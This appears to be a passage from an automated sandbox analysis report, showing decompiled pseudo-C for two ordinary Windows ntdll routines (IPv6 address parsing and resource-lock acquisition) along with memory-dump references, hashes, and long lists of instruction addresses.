                                                                                                                                                                                                          0x00907f37
                                                                                                                                                                                                          0x00907f37
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00923F12
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • ExecuteOptions, xrefs: 00923F04
                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00923EC4
                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0092E345
                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00923F75
                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00923F4A
                                                                                                                                                                                                          • Execute=1, xrefs: 00923F5E
                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0092E2FB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: BaseDataModuleQuery
                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                          • API String ID: 3901378454-484625025
                                                                                                                                                                                                          • Opcode ID: 05965bce3ca1e5c4f35e91b747857969d86ba02d8cd0644a7be82e1128812c04
                                                                                                                                                                                                          • Instruction ID: b674a414c082253e516574c1732681bdd2043e3cc387b61f3850f63845bb800c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05965bce3ca1e5c4f35e91b747857969d86ba02d8cd0644a7be82e1128812c04
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4041FA71A4021D7ADF20EA94ECC6FDAB3BCFF54710F0005A9B605E61C1EA74AB459F61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00910B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00910B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E008E8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E008DDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00910CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00910CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009106BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009106BA(_t135, _t178) == 0 || E00910A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00910CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00910CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009106BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009106BA(_t124, _t142) == 0 || E00910A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                                                                          0x00910b21
                                                                                                                                                                                                          0x00910b24
                                                                                                                                                                                                          0x00910b27
                                                                                                                                                                                                          0x00910b2a
                                                                                                                                                                                                          0x00910b2d
                                                                                                                                                                                                          0x00910b30
                                                                                                                                                                                                          0x00910b33
                                                                                                                                                                                                          0x00910b36
                                                                                                                                                                                                          0x00910b39
                                                                                                                                                                                                          0x00910b3e
                                                                                                                                                                                                          0x00910c65
                                                                                                                                                                                                          0x00910c68
                                                                                                                                                                                                          0x00910c6a
                                                                                                                                                                                                          0x00910c6f
                                                                                                                                                                                                          0x0093eb42
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eb48
                                                                                                                                                                                                          0x0093eb48
                                                                                                                                                                                                          0x00910c75
                                                                                                                                                                                                          0x00910c7a
                                                                                                                                                                                                          0x0093eb54
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eb5a
                                                                                                                                                                                                          0x00910c80
                                                                                                                                                                                                          0x00910c84
                                                                                                                                                                                                          0x0093eb98
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eba6
                                                                                                                                                                                                          0x00910cb8
                                                                                                                                                                                                          0x00910cba
                                                                                                                                                                                                          0x00910cd3
                                                                                                                                                                                                          0x00910cda
                                                                                                                                                                                                          0x00910ce4
                                                                                                                                                                                                          0x00910ce9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910cec
                                                                                                                                                                                                          0x00910c8c
                                                                                                                                                                                                          0x0093eb63
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eb70
                                                                                                                                                                                                          0x0093eb75
                                                                                                                                                                                                          0x0093eb7d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eb8c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eb8c
                                                                                                                                                                                                          0x00910c96
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910ca2
                                                                                                                                                                                                          0x00910cac
                                                                                                                                                                                                          0x00910cb4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910b44
                                                                                                                                                                                                          0x00910b47
                                                                                                                                                                                                          0x00910b49
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910b4f
                                                                                                                                                                                                          0x00910b50
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910b56
                                                                                                                                                                                                          0x00910b62
                                                                                                                                                                                                          0x00910b7c
                                                                                                                                                                                                          0x00910bac
                                                                                                                                                                                                          0x00910a0f
                                                                                                                                                                                                          0x0093eaaa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eac4
                                                                                                                                                                                                          0x0093eac4
                                                                                                                                                                                                          0x00910bd0
                                                                                                                                                                                                          0x00910bd0
                                                                                                                                                                                                          0x00910bd4
                                                                                                                                                                                                          0x00910bd9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910bdb
                                                                                                                                                                                                          0x00910be0
                                                                                                                                                                                                          0x0093eb0e
                                                                                                                                                                                                          0x00910a1a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910a1a
                                                                                                                                                                                                          0x0093eb1a
                                                                                                                                                                                                          0x0093eb1f
                                                                                                                                                                                                          0x0093eb27
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eb36
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eb36
                                                                                                                                                                                                          0x00910bea
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910bf6
                                                                                                                                                                                                          0x00910c00
                                                                                                                                                                                                          0x00910c03
                                                                                                                                                                                                          0x00910c0b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910c0b
                                                                                                                                                                                                          0x0093eaaa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910a15
                                                                                                                                                                                                          0x00910bb6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910bc6
                                                                                                                                                                                                          0x00910bc6
                                                                                                                                                                                                          0x00910bcb
                                                                                                                                                                                                          0x00910c15
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910c1d
                                                                                                                                                                                                          0x00910c20
                                                                                                                                                                                                          0x00910c21
                                                                                                                                                                                                          0x00910c24
                                                                                                                                                                                                          0x00910c24
                                                                                                                                                                                                          0x00910c26
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910c26
                                                                                                                                                                                                          0x00910bcd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910bcd
                                                                                                                                                                                                          0x00910b89
                                                                                                                                                                                                          0x00910b89
                                                                                                                                                                                                          0x00910b90
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910b96
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910b96
                                                                                                                                                                                                          0x00910a04
                                                                                                                                                                                                          0x00910a04
                                                                                                                                                                                                          0x00910b9a
                                                                                                                                                                                                          0x00910b9a
                                                                                                                                                                                                          0x00910b9b
                                                                                                                                                                                                          0x00910b9f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910ba5
                                                                                                                                                                                                          0x00910ac7
                                                                                                                                                                                                          0x00910aca
                                                                                                                                                                                                          0x0093eacf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eade
                                                                                                                                                                                                          0x0093eade
                                                                                                                                                                                                          0x0093eae3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eaf3
                                                                                                                                                                                                          0x0093eaf6
                                                                                                                                                                                                          0x0093eaf7
                                                                                                                                                                                                          0x0093eafe
                                                                                                                                                                                                          0x0093eb01
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eb01
                                                                                                                                                                                                          0x0093eacf
                                                                                                                                                                                                          0x00910ad0
                                                                                                                                                                                                          0x00910ad4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910ada
                                                                                                                                                                                                          0x00910ae6
                                                                                                                                                                                                          0x00910c34
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910c47
                                                                                                                                                                                                          0x00910c49
                                                                                                                                                                                                          0x00910c4a
                                                                                                                                                                                                          0x00910c4e
                                                                                                                                                                                                          0x00910c51
                                                                                                                                                                                                          0x00910c54
                                                                                                                                                                                                          0x00910c57
                                                                                                                                                                                                          0x00910c5a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910c60
                                                                                                                                                                                                          0x00910afb
                                                                                                                                                                                                          0x00910afe
                                                                                                                                                                                                          0x00910b02
                                                                                                                                                                                                          0x00910b05
                                                                                                                                                                                                          0x00910b08
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910b08
                                                                                                                                                                                                          0x00910ae6
                                                                                                                                                                                                          0x00910b44
                                                                                                                                                                                                          0x009109f8
                                                                                                                                                                                                          0x009109f8
                                                                                                                                                                                                          0x009109f9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eaa0
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fassign
                                                                                                                                                                                                          • String ID: .$:$:
                                                                                                                                                                                                          • API String ID: 3965848254-2308638275
                                                                                                                                                                                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                          • Instruction ID: 4c341bc0cd4cdd0165d215c8b7cc554e15125fba9fa2864f3f974a48ae18233f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CA19C71A0430EDFDF24CF64C8456FEB7B8AF95304F24856AD482A7281D6B69AC1CF91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00910554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                          			E00910554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009b01c0;
									_push(_t144);
									_push(0);
									_t51 = E008CF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00914FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00923F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00923F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0095217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00923F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00913915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009b01c0;
												_push(_t138);
												_push(0);
												_t58 = E008CF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00914FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00923F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00923F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0095217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00923F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00913915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E008F5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E008CF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00913915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E008CF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00913915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E008CF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00913915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E008F5329(_t110, _t138);
																_t69 = E008F53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                                                                          0x0091055a
                                                                                                                                                                                                          0x0091055d
                                                                                                                                                                                                          0x00910563
                                                                                                                                                                                                          0x00910566
                                                                                                                                                                                                          0x009105d8
                                                                                                                                                                                                          0x009105e2
                                                                                                                                                                                                          0x009105e5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009105e7
                                                                                                                                                                                                          0x009105e7
                                                                                                                                                                                                          0x009105ea
                                                                                                                                                                                                          0x009105f3
                                                                                                                                                                                                          0x009105f3
                                                                                                                                                                                                          0x00910568
                                                                                                                                                                                                          0x00910568
                                                                                                                                                                                                          0x00910568
                                                                                                                                                                                                          0x00910569
                                                                                                                                                                                                          0x00910569
                                                                                                                                                                                                          0x00910569
                                                                                                                                                                                                          0x0091056b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093217f
                                                                                                                                                                                                          0x00932183
                                                                                                                                                                                                          0x0093225b
                                                                                                                                                                                                          0x0093225f
                                                                                                                                                                                                          0x00932189
                                                                                                                                                                                                          0x0093218c
                                                                                                                                                                                                          0x0093218f
                                                                                                                                                                                                          0x00932194
                                                                                                                                                                                                          0x00932199
                                                                                                                                                                                                          0x0093219d
                                                                                                                                                                                                          0x009321a0
                                                                                                                                                                                                          0x009321a2
                                                                                                                                                                                                          0x009321ce
                                                                                                                                                                                                          0x009321ce
                                                                                                                                                                                                          0x009321ce
                                                                                                                                                                                                          0x009321d0
                                                                                                                                                                                                          0x009321d6
                                                                                                                                                                                                          0x009321de
                                                                                                                                                                                                          0x009321e2
                                                                                                                                                                                                          0x009321e8
                                                                                                                                                                                                          0x009321e9
                                                                                                                                                                                                          0x009321ec
                                                                                                                                                                                                          0x009321f1
                                                                                                                                                                                                          0x009321f6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009321f8
                                                                                                                                                                                                          0x009321fb
                                                                                                                                                                                                          0x00932206
                                                                                                                                                                                                          0x0093220b
                                                                                                                                                                                                          0x0093220c
                                                                                                                                                                                                          0x00932217
                                                                                                                                                                                                          0x00932226
                                                                                                                                                                                                          0x0093222b
                                                                                                                                                                                                          0x0093222c
                                                                                                                                                                                                          0x0093222f
                                                                                                                                                                                                          0x00932232
                                                                                                                                                                                                          0x00932235
                                                                                                                                                                                                          0x00932235
                                                                                                                                                                                                          0x0093223a
                                                                                                                                                                                                          0x0093223f
                                                                                                                                                                                                          0x00932241
                                                                                                                                                                                                          0x00932243
                                                                                                                                                                                                          0x00932248
                                                                                                                                                                                                          0x00932248
                                                                                                                                                                                                          0x0093224d
                                                                                                                                                                                                          0x0093224f
                                                                                                                                                                                                          0x00932262
                                                                                                                                                                                                          0x00932263
                                                                                                                                                                                                          0x00932268
                                                                                                                                                                                                          0x00932269
                                                                                                                                                                                                          0x00932269
                                                                                                                                                                                                          0x00932269
                                                                                                                                                                                                          0x0093226d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932276
                                                                                                                                                                                                          0x00932279
                                                                                                                                                                                                          0x0093227e
                                                                                                                                                                                                          0x00932283
                                                                                                                                                                                                          0x00932287
                                                                                                                                                                                                          0x0093228a
                                                                                                                                                                                                          0x0093228d
                                                                                                                                                                                                          0x0093228f
